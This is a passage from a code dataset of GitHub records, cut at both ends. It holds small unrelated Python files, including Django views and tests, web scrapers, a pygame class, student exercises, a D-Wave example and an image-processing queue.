Migration(migrations.Migration):\n dependencies = [\n ('tests', '0001_initial'),\n ]\n\n operations = [\n migrations.RunPython(add_data)\n ]\n","repo_name":"Apkawa/django-admin-view","sub_path":"tests/migrations/0002_data.py","file_name":"0002_data.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15804627695","text":"import urllib\nimport re\n\n#url = raw_input(\"Please enter the URL to scrape: \")\nlastId = raw_input(\"Please enter the numeric ID of the highest athletic ID: \")\nsport = raw_input(\"Please enter the sport: \")\n\nurl = \"http://pacifictigers.com/sports/m-wpolo/2016-17/roster\"\n\ndef removeTabs(htmltext):\n newString = \"\"\n for c in htmltext:\n if (c == '\\r') or (c == '\\n') or (c == '\\t'):\n pass\n else:\n newString+=c\n return newString\n\nregex = 'title=\"Player\\'s Bio\">(.+?)'\nregex2 = '(.+?)' #will be an array of positions that corresponds to names\npattern = re.compile(regex)\npattern2 = re.compile(regex2)\n\nhtmlfile = urllib.urlopen(url)\nhtmltext = htmlfile.read()\n\nraw_html = removeTabs(htmltext)\n\nwith open(\"Raw_HTML.txt\", \"w\") as file:\n file.write(raw_html)\n\nnames = re.findall(pattern,htmltext)\npos = re.findall(pattern2, raw_html)\n\n\ndef removeWhitespace(pos):\n newPos = []\n for position in pos:\n newPos.append(position.strip(' '))\n return newPos\n\n\npos = removeWhitespace(pos)\n\nwith open(\"Output.txt\", \"w\") as text_file:\n for index, n in enumerate(names):\n insertStatement = \"insert into athlete values(\" + str(int(lastId)+index) + \", '\" + n + \"', '\"+ sport + \"', '\" + pos[index]+\"', 0.00);\"\n text_file.write(insertStatement+\"\\n\")","repo_name":"jkaehler/web_scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11157892099","text":"import pdfplumber\nfrom sklearn.cluster import OPTICS\nimport numpy as np\nimport cv2\nimport pandas as pd\n\nKEEP_BLANK_CHARS = False\nN_SAMPLES = 3\n\nif __name__ == \"__main__\":\n with pdfplumber.open(\"samples/sample4.pdf\") as pdf:\n p0 = pdf.pages[0]\n im = p0.to_image()\n words_obj1 = p0.extract_words(keep_blank_chars=KEEP_BLANK_CHARS,\n #x_tolerance=10,\n #y_tolerance=20\n )[:-1]\n words_obj2 = p0.extract_words(keep_blank_chars=KEEP_BLANK_CHARS,\n # x_tolerance=10,\n # y_tolerance=20\n )[1:]\n\n color = [\"red\",\"blue\",\"green\",\"black\",\"yellow\",\"grey\",\"red\",\"blue\",\"green\",\"black\"]\n bbox = []\n for i, (item1, item2) in enumerate(zip(words_obj1, words_obj2)):\n if item1['text'] == \"X\" and item2['text'] == \")\":\n im.draw_rects((item1['x0'], item1['top'], item2['x1'], item2['bottom']), stroke=color[i])\n\n #im.draw_rects(bbox)\n\n im.save(\"samples/sample_out.png\")\n cim = cv2.imread(\"samples/sample_out.png\")\n cv2.imshow(\"output\", cim)\n cv2.waitKey(0)\n","repo_name":"shezgone/pdf_ocr_api","sub_path":"pdf_area.py","file_name":"pdf_area.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4469032293","text":"headline = ['caesId','id','name','sex','age','preliminary','CC','HOPI','diagnosis','diagnosisTCM','change','prescription','other']\r\ndictionary = {'caesId':'病例编号','id':'患者登记号','name':'姓名','sex':'性别','age':'年龄','preliminary':'初诊复诊','CC':'主诉','HOPI':'现病史','change':'较前变化的症状','prescription':'处方','diagnosis':'西医诊断','diagnosisTCM':'中医诊断','other':'备注'}\r\n\r\ndef caseobj(caseId):\r\n case = {}\r\n for i in range(len(headline)):\r\n cn = dictionary[headline[i]]\r\n if i == 0:\r\n case[cn] = caseId\r\n elif i in [1,2,3,4,5,6]:\r\n string = input('{0}:'.format(cn))\r\n case[cn] = string\r\n print('{0}:{1}'.format(cn,string))\r\n elif i == 7:\r\n TempHOPI = ''\r\n while True:\r\n string = input('{0}:'.format(cn))\r\n if string != 'end':\r\n TempHOPI = TempHOPI + string\r\n else:\r\n break\r\n case[cn] = TempHOPI\r\n print('{0}:{1}'.format(cn,TempHOPI))\r\n elif i in [8,9,12]:\r\n case[cn] = []\r\n while True:\r\n string = input('{0}:'.format(cn))\r\n if string != 'end':\r\n case[cn].append(string)\r\n else:\r\n break\r\n print('{0}:{1}'.format(cn,case[cn]))\r\n elif i == 10:\r\n case[cn] = {}\r\n while True:\r\n change = input('较前改变的症状:')\r\n how = input('如何改变:')\r\n if change != 'end':\r\n case[cn][change] = how\r\n else:\r\n break\r\n print('{0}:{1}'.format(cn,case[cn]))\r\n elif i == 11:\r\n case[cn] = []\r\n while True:\r\n jishu = input('剂数:')\r\n jixing = input('剂型:')\r\n fangfa = input('服用方法:')\r\n if jishu == 'end' or jixing == 'end' or fangfa == 'end':\r\n break\r\n else:\r\n fang = [jishu,jixing,fangfa]\r\n fangyao = {}\r\n while True:\r\n yao = input('药名:')\r\n quantity = input('剂量:')\r\n if yao == 'end' or quantity == 'end':\r\n break\r\n else:\r\n if quantity[-1] in [1,2,3,4,5,6,7,8,9,0]:\r\n quantity = quantity + 'g'\r\n fangyao[yao] = quantity\r\n fang.append(fangyao)\r\n case[cn].append(fang)\r\n print('{0}:{1}'.format(cn,case[cn]))\r\n return case\r\ndata = caseobj('000000')\r\nprint(data)","repo_name":"mengcanzhai/caseSystem_forTCM","sub_path":"debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23467506863","text":"from rest_framework.test import APITestCase, RequestsClient\nfrom rest_framework import status\n\n\nclass QuestionAPITestCase(APITestCase):\n\n def test_question_post(self):\n print(\"Test question post\")\n client = RequestsClient()\n url = 'http://127.0.0.1:8000/api/question/'\n data = {\"name\": \"John\", \"question\": \"Where is my socks?\"}\n response = client.post(url=url, data=data)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n\nclass AnswerAPITestCase(APITestCase):\n\n def test_answer_get(self):\n print(\"Test answer get\")\n client = RequestsClient()\n url = 'http://127.0.0.1:8000/api/answer/'\n response = client.get(url=url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n\nclass FAQAPITestCase(APITestCase):\n\n def test_faq_get(self):\n print(\"Test FAQ get\")\n client = RequestsClient()\n url = 'http://127.0.0.1:8000/api/faq/'\n response = client.get(url=url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)","repo_name":"diushes/myownrel","sub_path":"ask_a_question/tests/test_view.py","file_name":"test_view.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20467046020","text":"import dwave\nimport dimod\nimport numpy as np\n\nchains1 = [(0, 1, 2), (3, 4)]\nsamples1 = np.array([[1, 1, 0, 0, 0],\n [1, 1, 1, 0, 0],\n [1, 1, 1, 0, 1],\n [1, 1, 1, 1, 1],\n ], dtype=np.int8)\n\n# ? unembedded, idx = dwave.embedding.chain_breaks.discard(samples, chains)\n# ? unembedded, idx = dwave.embedding.chain_breaks.majority_vote(samples, chains)\n# ? unembedded, idx = dwave.embedding.chain_breaks.weighted_random(samples, chains)\n# print(idx)\n# print(unembedded)\n\nh = {'a': 0, 'b': 0, 'c': 0}\nJ = {('a', 'b'): 1, ('b', 'c'): 1, ('a', 'c'): 1}\nbqm = dimod.BinaryQuadraticModel.from_ising(h, J)\nembedding = {'a': [0], 'b': [1], 'c': [2, 3]}\n# ? cbm = dwave.embedding.chain_breaks.MinimizeEnergy(bqm, embedding)\nsamples2 = np.array([[+1, -1, +1, +1],\n [-1, -1, -1, -1],\n [-1, -1, +1, -1],\n [+1, +1, -1, +1]],\n dtype=np.int8)\nchains2 = [embedding['a'], embedding['b'], embedding['c']]\n# unembedded, idx = cbm(samples2, chains2)\n# print(unembedded)\n","repo_name":"kitamuyu/pyqubo-tutorial","sub_path":"chapter6/chains.py","file_name":"chains.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"1605247495","text":"import asyncio\nimport gc\nimport hashlib\nimport logging\nimport os\nimport sys\nimport traceback\nfrom concurrent.futures import Executor\nfrom typing import List, Callable, Dict\n\nfrom PIL import Image\n\nimport panoptic.compute as compute\nfrom panoptic.core import db\nfrom panoptic.models import ImageImportTask\n\nlogger = logging.getLogger('ProcessQueue')\n\n\nclass ProcessQueue:\n def __init__(self, executor: Executor):\n self.executor = executor\n\n self._queue = asyncio.Queue()\n self._workers: List[asyncio.Task] = []\n self._working: Dict[int, bool] = {}\n self.done_callback = None\n\n def start_workers(self, workers=1):\n if self._workers:\n return\n for i in range(workers):\n self._workers.append(asyncio.create_task(self._process_queue(i)))\n\n def add_task(self, task):\n self._queue.put_nowait(task)\n\n def done(self):\n return self._queue.qsize() == 0\n\n async def _process_queue(self, worker_id: int):\n while True:\n try:\n # if nothing left to do remove working flag\n if self.done():\n self._working[worker_id] = False\n\n task = await self._queue.get()\n # set working flag\n self._working[worker_id] = True\n\n res = await self._process_task(task)\n if self.done_callback:\n\n is_last = self.done() and self.get_working_nb() == 1\n self.done_callback(res, is_last)\n except Exception as e:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n logger.error(\"\".join(traceback.format_exception(exc_type, exc_value, exc_traceback)))\n logger.error(e)\n\n def get_working_nb(self):\n working = [v for v in self._working.values() if v]\n return len(working)\n\n async def _process_task(self, task):\n raise NotImplementedError()\n\n async def _execute_in_process(self, fnc: Callable, *args):\n return await asyncio.wrap_future(self.executor.submit(fnc, *args))\n\n\nclass ImportImageQueue(ProcessQueue):\n def add_task(self, task: ImageImportTask):\n super().add_task(task)\n\n async def _process_task(self, task: ImageImportTask):\n # print('process: ', task.image_path, task.folder_id)\n name = task.image_path.split(os.sep)[-1]\n extension = name.split('.')[-1]\n folder_id = task.folder_id\n\n db_image = await db.has_image_file(folder_id, name, extension)\n if db_image:\n return db_image\n\n sha1, url, width, height = await self._execute_in_process(self._import_image, task.image_path)\n\n image = await db.add_image(folder_id, name, extension, sha1, url, width, height)\n # print(f'imported image: {image.id} : {image.sha1}')\n return image\n\n @staticmethod\n def _import_image(file_path):\n image = Image.open(file_path)\n width, height = image.size\n sha1_hash = hashlib.sha1(image.tobytes()).hexdigest()\n # TODO: gérer l'url statique quand on sera en mode serveur\n # url = os.path.join('/static/' + file_path.split(os.getenv('PANOPTIC_ROOT'))[1].replace('\\\\', '/'))\n url = f\"/images/{file_path}\"\n image = image.convert('RGB')\n mini = image.copy()\n mini.thumbnail(size=(200, 200))\n mini.save(os.path.join(os.environ['PANOPTIC_DATA'], \"mini\", sha1_hash + '.jpeg'), optimize=True, quality=30)\n\n del image\n del mini\n # gc.collect()\n\n return sha1_hash, url, width, height\n\n\nclass ComputeVectorsQueue(ProcessQueue):\n async def _process_task(self, task):\n image_id: int = task\n image = (await db.get_images(ids=[image_id]))[0]\n computed = await db.get_sha1_computed_values([image.sha1])\n if computed:\n return computed\n\n folder = await db.get_folder(image.folder_id)\n file_path = f\"{folder.path}/{image.name}\"\n ahash, vector = await self._execute_in_process(self.compute_image, file_path)\n res = await db.set_computed_value(sha1=image.sha1, ahash=ahash, vector=vector)\n del vector\n # gc.collect()\n print('computed image: ', image_id, ' : ', res.sha1)\n return res\n\n @staticmethod\n def compute_image(image_path: str):\n image = Image.open(image_path)\n image = image.convert('RGB')\n ahash = str(compute.to_average_hash(image))\n # TODO: find a way to access all the images for PCA\n vector = compute.to_vector(image)\n\n del image\n # gc.collect()\n\n return ahash, vector\n","repo_name":"CERES-Sorbonne/Panoptic","sub_path":"panoptic_back/panoptic/core/process_queue.py","file_name":"process_queue.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7445850806","text":"if __name__== \"__main__\":\n x= int(input(\"请输入一个5位数整数:\"))\n if x<10000or x>99999:\n print(\"输入错误\")\n else:\n ten_thousand= x//10000\n thousand= x%10000//1000\n ten= x%100//10\n indiv= x%10\n if indiv== ten_thousand and ten== thousand:\n print(\"%d是回文数\"%x)\n else:\n print(\"%d不是回文数\"%x)\n ","repo_name":"ljflisp/ljflisp","sub_path":"python文件/python中文文件/回文诗.py","file_name":"回文诗.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"16600434513","text":"import sys\n\n\ndef work1():\n a = 4\n print(type(a))\n a = 'esw'\n print(type(a))\n a = 2.1\n print(type(a))\n\n\n# Создайте в переменной data список значений разных\n# типов перечислив их через запятую внутри квадратных скобок.\n# Для каждого элемента в цикле выведите:\n# порядковый номер начиная с единицы\n# значение\n# адрес в памяти\n# размер в памяти\n# хэш объекта\n# результат проверки на целое число только если он положительный\n# результат проверки на строку только если он положительный\n#\n# *Добавьте в список повторяющиеся элементы и сравните на результаты.\n\n\ndef work2():\n my_list = [21, 456, 'hello', True, 3, 'hello']\n for i, item in enumerate(my_list, 1):\n number_output = 'Это целое число' if isinstance(item, int) else ''\n str_output = 'Это строка' if isinstance(item, str) else ''\n print(f'номер: {i}; '\n f'значение: {item}; '\n f'Хэш объекта - {hash(item)};'\n f'{number_output}'\n f'{str_output}')\n\n\n# Напишите программу, которая получает целое число\n# и возвращает его двоичное, восьмеричное строковое представление.\n# Функции bin и oct используйте для проверки своего результата.\n\n# *Дополнительно\n# Попробуйте избежать дублирования кода в преобразованиях к разным системам счисления\n# Избегайте магических чисел\n# Добавьте аннотацию типов где это возможно\nBINARY_SYSTEM = 2\nOCTAL_SYSTEM = 8\n\n\ndef system_selection() -> int:\n system: int = 0\n\n while system != BINARY_SYSTEM and system != OCTAL_SYSTEM:\n system = int(input('\\nВыберите систему счисления\\n'\n '2 - двоичная\\n'\n '8 - восьмиричная\\n'))\n return system\n\n\ndef transfer_system(number: int, system: int) -> str:\n result: str = ''\n\n while number != 0:\n mod: str = str(number % system)\n result = mod + result\n number //= system\n\n return result\n\n\ndef work3():\n number: int = int(input('введите число:\\n'))\n\n selection: int = system_selection()\n transfer: str = transfer_system(number, selection)\n\n print(f'\\nРезультат: {transfer}')\n print(f'двоичная система: {bin(number)[2:]}')\n print(f'восьмеричная система: {oct(number)[2:]}')\n\n\n# Напишите программу, которая вычисляет площадь круга и\n# длину окружности по введённому диаметру.\n# Диаметр не превышает 1000 у.е.\n# Точность вычислений должна составлять\n# не менее 42 знаков после запятой.\n\nfrom decimal import Decimal, getcontext\nfrom math import pi\n\ngetcontext().prec = 42\nnum_pi = Decimal(pi)\n\ndiametr: Decimal = 0\nwhile diametr not in range(1, 1001):\n diametr = Decimal(input('введите диаметр от 1 до 1000:\\n'))\n\narea: Decimal = (num_pi * diametr ** 2 / 4)\nlength: Decimal = (num_pi * diametr)\n\nprint(f'площадь = {area}')\nprint(f'длина: {length}')\n","repo_name":"FominaCathy/Python_part_2","sub_path":"SEMINARS_new/seminar_2.py","file_name":"seminar_2.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"37729386518","text":"import pygame\nclass Bullet1:\n def __init__(self, game_settings, screen, ship) -> None:\n self.screen = screen\n self.ship = ship\n self.game_settings = game_settings\n\n self.image = pygame.image.load('img/bullet1.png').convert_alpha()\n\n self.rect = self.image.get_rect()\n\n self.rect.midbottom = self.ship.rect.midtop\n self.y = float(self.ship.rect.centery)\n\n self.mask = pygame.mask.from_surface(self.image)\n\n def update(self, x):\n if self.y < 10:\n self.rect.centerx = x\n\n self.y -= self.game_settings.bullet_speed_factor\n self.rect.centery = self.y\n if self.y < 0:\n self.reset()\n\n def blitme(self):\n # 指定位置画飞船\n self.screen.blit(self.image, self.rect)\n \n def reset(self):\n self.y = float(self.ship.rect.centery)","repo_name":"adrablezzz/python","sub_path":"py_games/plane/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1594218490","text":"from django.test import TestCase\nfrom ..models import *\nfrom django.core.files.uploadedfile import SimpleUploadedFile\n\n\nclass RestaurantTest(TestCase):\n\n def setUp(self):\n Restaurant.objects.create(title=\"Restaurant1\")\n\n def test_instance(self):\n obj = Restaurant.objects.get(id=1)\n self.assertEqual(\n obj.title, \"Restaurant1\")\n\n\nclass EmployeeTest(TestCase):\n\n def setUp(self):\n Employee.objects.create(username='Employee1', name='Employee1 full name')\n\n def test_instance(self):\n obj = Employee.objects.get(username=\"Employee1\")\n self.assertEqual(\n obj.username, \"Employee1\")\n self.assertEqual(\n obj.name, \"Employee1 full name\")\n\n\nclass MenuTest(TestCase):\n\n def setUp(self):\n file = SimpleUploadedFile(\"pdf_for_text.pdf\", b\"file_content\", content_type=\"text/pdf\")\n Restaurant.objects.create(title=\"Restaurant1\")\n restaurant = Restaurant.objects.get(id=1)\n Menu.objects.create(restaurant_id=restaurant.id, filepath=file)\n\n def test_instance(self):\n obj = Menu.objects.get(id=1)\n self.assertEqual(\n obj.restaurant_id, 1)\n\n\nclass VoteTest(TestCase):\n\n def setUp(self):\n file = SimpleUploadedFile(\"pdf_for_text.pdf\", b\"file_content\", content_type=\"text/pdf\")\n Restaurant.objects.create(title='Restaurant1')\n Employee.objects.create(username='Employee1', name='Employee1 full name')\n restaurant = Restaurant.objects.get(id=1)\n employee = Employee.objects.get(id=1)\n Menu.objects.create(restaurant_id=restaurant.id, filepath=file)\n\n menu = Menu.objects.get(id=1)\n Vote.objects.create(employee_id=employee.id, menu_id=menu.id)\n\n def test_instance(self):\n obj = Vote.objects.get(id=1)\n self.assertEqual(obj.employee_id, 1)\n self.assertEqual(obj.menu_id, 1)\n\n","repo_name":"DaniloRodrigo/corner_case","sub_path":"menu/tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43125577635","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.views.generic import TemplateView\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.urls import reverse\nimport logging\nimport six\n\nfrom .models import Puzzle, Entry, Clue\nfrom .forms import EntryForm\n\n# view for user to start new drill\nclass LogInView(TemplateView):\n template_name = 'login.html'\n\n def get_context_data(self, **kwargs):\n context = super(LogInView, self).get_context_data(**kwargs)\n\n # initialize new session\n self.request.session['total'] = 0\n self.request.session['correct'] = 0\n self.request.session['repeat'] = False\n\n if self.request.session.has_key('clue_id'):\n del self.request.session['clue_id']\n\n return context\n\n# view to present random clue with information about entry\nclass DrillView(TemplateView):\n template_name = 'drill.html'\n\n def get_context_data(self, **kwargs):\n context = super(DrillView, self).get_context_data(**kwargs)\n repeat = False\n\n # check session if clue is repeated\n if self.request.session.has_key('repeat'):\n repeat = self.request.session['repeat']\n\n # check if clue is being repeated, get clue instance\n if repeat:\n clue_id = self.request.session['clue_id']\n\n try:\n random_clue = Clue.objects.get(pk=clue_id)\n except Clue.DoesNotExist:\n raise Http404(\"Such Clue Does Not Exist\")\n\n else:\n # Initialize values for new clue instance\n random_clue = Clue.objects.order_by(\"?\").first()\n clue_id = random_clue.id\n\n self.request.session['clue_id'] = clue_id\n self.request.session['total'] += 1\n self.request.session['success'] = False\n\n # add data to context for templates\n context['entry_form'] = EntryForm()\n context['random_clue'] = random_clue\n context['repeat'] = repeat\n\n context['total'] = self.request.session['total']\n context['correct'] = self.request.session['correct']\n\n return context\n\n\n def post(self, request, *args, **kwargs):\n # check if clue id exists in current session / if not, redirect to drill page\n if not request.session.has_key('clue_id'):\n self.request.session['repeat'] = False\n return HttpResponseRedirect(reverse('drill'))\n\n # Get clue ID\n clue_id = self.request.session['clue_id']\n\n # Fetch POST field from Entry Form\n entry_form = EntryForm(request.POST or None)\n entry_text = entry_form['entry_text'].value()\n\n # validate entry text\n if not isinstance(entry_text, six.text_type):\n raise Exception('Entry Text must be a string')\n\n # Get Clue Data and find match with entry text\n clue_match = Clue.objects.get(pk=clue_id)\n entry_match = Entry.objects.filter(entry_text=entry_text.upper()).first()\n\n logger = logging.getLogger(__name__)\n if entry_match == clue_match.entry:\n # keep track of correct answers (int), wrong answer (bool), and success qnw3\n logger.info('Match found')\n self.request.session['correct'] += 1\n self.request.session['repeat'] = False\n self.request.session['success'] = True\n\n # Redirects to the view product of product details and for review\n return HttpResponseRedirect(reverse('answer'))\n\n logger.info(\"Match not found\")\n request.session['repeat'] = True\n return HttpResponseRedirect(reverse('drill'))\n\n\n\n\n# view to congratulates the user on their success\nclass AnswerView(TemplateView):\n template_name = 'answer.html'\n\n def get_context_data(self, **kwargs):\n context = super(AnswerView, self).get_context_data(**kwargs)\n\n # check if clue id exists in current session / if not, redirect to drill page\n if not self.request.session.has_key('clue_id'):\n return HttpResponseRedirect(reverse('drill'))\n\n # reset repeat clue option to default\n if self.request.session.has_key('repeat'):\n self.request.session['repeat'] = False\n\n # get clue ID from current session\n clue_id = self.request.session['clue_id']\n\n # get clue information from DB\n try:\n clue = Clue.objects.get(pk=clue_id)\n\n except Clue.DoesNotExist:\n raise Http404(\"Such Clue Does Not Exist\")\n\n # get information for puzzles that include clue text\n puzzles = Puzzle.objects.get_clue_puzzles(clue.clue_text)\n\n # get information of other clues with the same entry\n other_clues = Clue.objects.filter(entry=clue.entry)\n\n # add data to context for templates\n context['puzzles'] = puzzles\n context['clue'] = clue\n context['other_clues'] = other_clues\n\n context['total'] = self.request.session['total']\n context['correct'] = self.request.session['correct']\n context['success'] = self.request.session['success']\n\n return context\n","repo_name":"hassanbadru/xword_task","sub_path":"xword_data/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18208836623","text":"import pprint\r\nfrom tempfile import mktemp\r\nfrom urllib.request import urlopen, Request, urlretrieve\r\nfrom zipfile import ZipFile\r\n\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\n\r\nURL = 'https://archaeologydataservice.ac.uk/archives/view/hayton_eh_2007/'\r\n\r\n\r\nURL='https://archaeologydataservice.ac.uk/archives/view/alanvince_eh_2010/'\r\n\r\npage = requests.get(URL)\r\npp = pprint.PrettyPrinter(indent=4)\r\n\r\nsoup = BeautifulSoup(page.content,'html.parser')\r\n\r\nmetadata=soup.find( id='metadata').find('ul','dlMenu').find_all('li')\r\ndownloads_link=None\r\nfor el in metadata:\r\n if el.find('a').get('href').find('downloads')!=-1:\r\n downloads_link=el.find('a').get('href')\r\nif downloads_link!=None:\r\n downloads_url=URL+downloads_link\r\n\r\n\r\npage_downloads = requests.get(downloads_url).content\r\n\r\n\r\nsoup = BeautifulSoup(page_downloads,'html.parser')\r\narchive=soup.find(\"div\", {\"id\": \"archive\"})\r\n\r\nlinks = archive.find_all('a')\r\n\r\nfor el in links:\r\n # if el['href'].find('form')!=-1:\r\n page = requests.get(URL+el['href'])\r\n soup = BeautifulSoup(page.content, 'html.parser')\r\n links2 = soup.find_all('a')\r\n for link in links2:\r\n if link.has_attr('href'):\r\n href=link['href']\r\n if '.zip' in href:\r\n # remoteZip = urlopen(Request(URL+href))\r\n file_name = href.rpartition('/')[-1]\r\n file=file_name.split('?')\r\n filename = file[0]\r\n\r\n destDir = mktemp(filename.split(\".\")[0])\r\n theurl = URL+href\r\n name, hdrs = urlretrieve(theurl, filename)\r\n thefile = ZipFile(filename)\r\n thefile.extractall(destDir)\r\n thefile.close()\r\n\r\n # file_name = href.rpartition('/')[-1]\r\n # file=file_name.split('?')\r\n # local_file = open(file_name[0], 'wb+')\r\n # local_file.write(remoteZip.read())\r\n # local_file.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"bgir2464/dataprocessing","sub_path":"page_scraper.py","file_name":"page_scraper.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9502923317","text":"\"\"\"Service for widget management.\"\"\"\nfrom http import HTTPStatus\n\nfrom met_api.constants.membership_type import MembershipType\nfrom met_api.exceptions.business_exception import BusinessException\nfrom met_api.models.widget import Widget as WidgetModel\nfrom met_api.models.widget_item import WidgetItem\nfrom met_api.schemas.widget import WidgetSchema\nfrom met_api.schemas.widget_item import WidgetItemSchema\nfrom met_api.services import authorization\nfrom met_api.utils.roles import Role\n\n\nclass WidgetService:\n \"\"\"Widget management service.\"\"\"\n\n @staticmethod\n def get_widgets_by_engagement_id(engagement_id):\n \"\"\"Get widgets by engagement id.\"\"\"\n widget_schema = WidgetSchema(many=True)\n widgets_records = WidgetModel.get_widgets_by_engagement_id(engagement_id)\n widgets = widget_schema.dump(widgets_records)\n return widgets\n\n @staticmethod\n def get_widget_items_by_widget_id(widget_id):\n \"\"\"Get widget items by widget id.\"\"\"\n widget_item_schema = WidgetItemSchema(many=True)\n widget_items_records = WidgetItem.get_widget_items_by_widget_id(widget_id)\n widget_items = widget_item_schema.dump(widget_items_records)\n return widget_items\n\n @staticmethod\n def create_widget(widget_data, engagement_id):\n \"\"\"Create widget item.\"\"\"\n one_of_roles = (\n MembershipType.TEAM_MEMBER.name,\n Role.EDIT_ENGAGEMENT.value\n )\n authorization.check_auth(one_of_roles=one_of_roles, engagement_id=engagement_id)\n\n if widget_data.get('engagement_id', None) != int(engagement_id):\n raise ValueError('widget data has engagement id for a different engagement')\n\n sort_index = WidgetService._find_higest_sort_index(engagement_id)\n\n widget_data['sort_index'] = sort_index + 1\n created_widget = WidgetModel.create_widget(widget_data)\n return WidgetSchema().dump(created_widget)\n\n @staticmethod\n def _find_higest_sort_index(engagement_id):\n # find the highest sort order of the engagement\n sort_index = 0\n widgets = WidgetModel.get_widgets_by_engagement_id(engagement_id)\n if widgets:\n # Find the largest in the existing widgest\n sort_index = max(widget.sort_index for widget in widgets)\n return sort_index\n\n @staticmethod\n def sort_widget(engagement_id, widgets: list, user_id=None):\n \"\"\"Sort widgets.\"\"\"\n WidgetService._validate_widget_ids(engagement_id, widgets)\n\n one_of_roles = (\n MembershipType.TEAM_MEMBER.name,\n Role.EDIT_ENGAGEMENT.value\n )\n authorization.check_auth(one_of_roles=one_of_roles, engagement_id=engagement_id)\n\n widget_sort_mappings = [{\n 'id': widget.get('id'),\n 'sort_index': index + 1,\n 'updated_by': user_id\n } for index, widget in enumerate(widgets)\n ]\n\n WidgetModel.update_widgets(widget_sort_mappings)\n\n @staticmethod\n def update_widget(engagement_id, widget_id: list, widget_data: dict, user_id=None):\n \"\"\"Sort widgets.\"\"\"\n WidgetService._verify_widget(widget_id)\n\n widget_data['updated_by'] = user_id\n\n one_of_roles = (\n MembershipType.TEAM_MEMBER.name,\n Role.EDIT_ENGAGEMENT.value\n )\n authorization.check_auth(one_of_roles=one_of_roles, engagement_id=engagement_id)\n\n updated_widget = WidgetModel.update_widget(engagement_id, widget_id, widget_data)\n return WidgetSchema().dump(updated_widget)\n\n @staticmethod\n def _validate_widget_ids(engagement_id, widgets):\n \"\"\"Validate if widget ids belong to the engagement.\"\"\"\n eng_widgets = WidgetModel.get_widgets_by_engagement_id(engagement_id)\n widget_ids = [widget.id for widget in eng_widgets]\n input_widget_ids = [widget_item.get('id') for widget_item in widgets]\n if len(set(widget_ids) - set(input_widget_ids)) > 0:\n raise BusinessException(\n error='Invalid widgets.',\n status_code=HTTPStatus.BAD_REQUEST)\n\n @staticmethod\n def _verify_widget(widget_id):\n \"\"\"Verify if widget exists.\"\"\"\n widget = WidgetModel.get_widget_by_id(widget_id)\n if not widget:\n raise KeyError('Widget ' + widget_id + ' does not exist')\n return widget\n\n @staticmethod\n def create_widget_items_bulk(widget_items: list, user_id):\n \"\"\"Create widget items in bulk.\"\"\"\n for item in widget_items:\n item['created_by'] = user_id\n item['updated_by'] = user_id\n\n created_widgets_records = WidgetItem.create_all_widget_items(widget_items)\n return WidgetItemSchema(many=True).dump(created_widgets_records)\n\n def create_added_widget_items(self, widget_items: list, widget_items_db: list, user_id):\n \"\"\"Get the widgets to add and send them to be inserted in DB.\"\"\"\n widget_items_db_data_ids = [widget_item.widget_data_id for widget_item in widget_items_db]\n\n widget_items_to_add = [widget_item for widget_item in widget_items\n if widget_item.get('widget_data_id') not in widget_items_db_data_ids]\n if len(widget_items_to_add) > 0:\n self.create_widget_items_bulk(widget_items_to_add, user_id)\n return widget_items_to_add\n\n @staticmethod\n def delete_removed_widget_items(widget_items_to_remain: list, widget_items_db: list):\n \"\"\"Get the widgets to be deleted and send them to be deleted from DB.\"\"\"\n widget_items_to_remain_data_ids = [widget_item.get('widget_data_id') for widget_item in widget_items_to_remain]\n\n wiget_items_ids_to_delete = [widget_item.id for widget_item in widget_items_db\n if widget_item.widget_data_id not in widget_items_to_remain_data_ids]\n if len(wiget_items_ids_to_delete) > 0:\n WidgetItem.delete_widget_items(wiget_items_ids_to_delete)\n\n return wiget_items_ids_to_delete\n\n @staticmethod\n def update_widget_items_sorting(widget_items: list, widget_id, user_id):\n \"\"\"Update widget items sorting in bulk.\"\"\"\n widget_data_ids = [widget_item.get('widget_data_id') for widget_item in widget_items]\n widget_items_db = WidgetItem.get_widget_items_by_widget_id(widget_id)\n\n widget_items_update_mapping = [{\n 'id': 